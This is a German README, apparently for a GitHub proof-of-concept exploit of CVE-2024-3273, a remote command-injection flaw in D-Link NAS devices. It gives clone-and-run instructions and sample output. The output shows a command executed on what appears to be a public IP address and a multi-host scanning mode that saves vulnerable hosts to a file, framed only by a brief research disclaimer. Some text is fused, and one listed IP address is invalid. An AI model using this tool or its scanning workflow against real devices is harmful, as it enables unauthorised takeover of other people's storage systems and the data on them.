
Exploit für CVE-2024-3273, unterstützt einzelne und mehrere Hosts
Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2024-3273, eine Sicherheitslücke, die in D-Link-NAS-Geräten entdeckt wurde. Die Sicherheitslücke ermöglicht es Angreifern, beliebige Befehle auf anfälligen Geräten auszuführen.
CVE-2024-3273 ist eine Sicherheitslücke in D-Link-NAS-Geräten, die es entfernten Angreifern ermöglicht, beliebige Befehle über eine manipulierte HTTP-Anfrage an den cgi-bin/nas_sharing.cgi-Endpunkt auszuführen.
Dieser PoC zeigt, wie die Sicherheitslücke ausgenutzt werden kann, um Befehle auf anfälligen D-Link-NAS-Geräten auszuführen.
requests-BibliothekKlonen Sie dieses Repository:
git clone https://github.com/adhikara13/CVE-2024-3273.git
Wechseln Sie in das Repository-Verzeichnis:
cd CVE-2024-3273
Führen Sie den PoC aus:
python main.py
Folgen Sie den Anweisungen auf dem Bildschirm, um das Zielgerät auszuwählen:
host:port enthält, und wählen Sie, ob anfällige Hosts nach vulnerables.txt exportiert werden sollen.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Dieser PoC dient ausschließlich Bildungs- und Forschungszwecken. Verwenden Sie ihn verantwortungsbewusst und nur auf Geräten, die Sie zu testen autorisiert sind.
Beiträge sind willkommen! Wenn Sie Probleme oder Verbesserungsvorschläge finden, können Sie gerne ein Issue eröffnen oder einen Pull Request erstellen.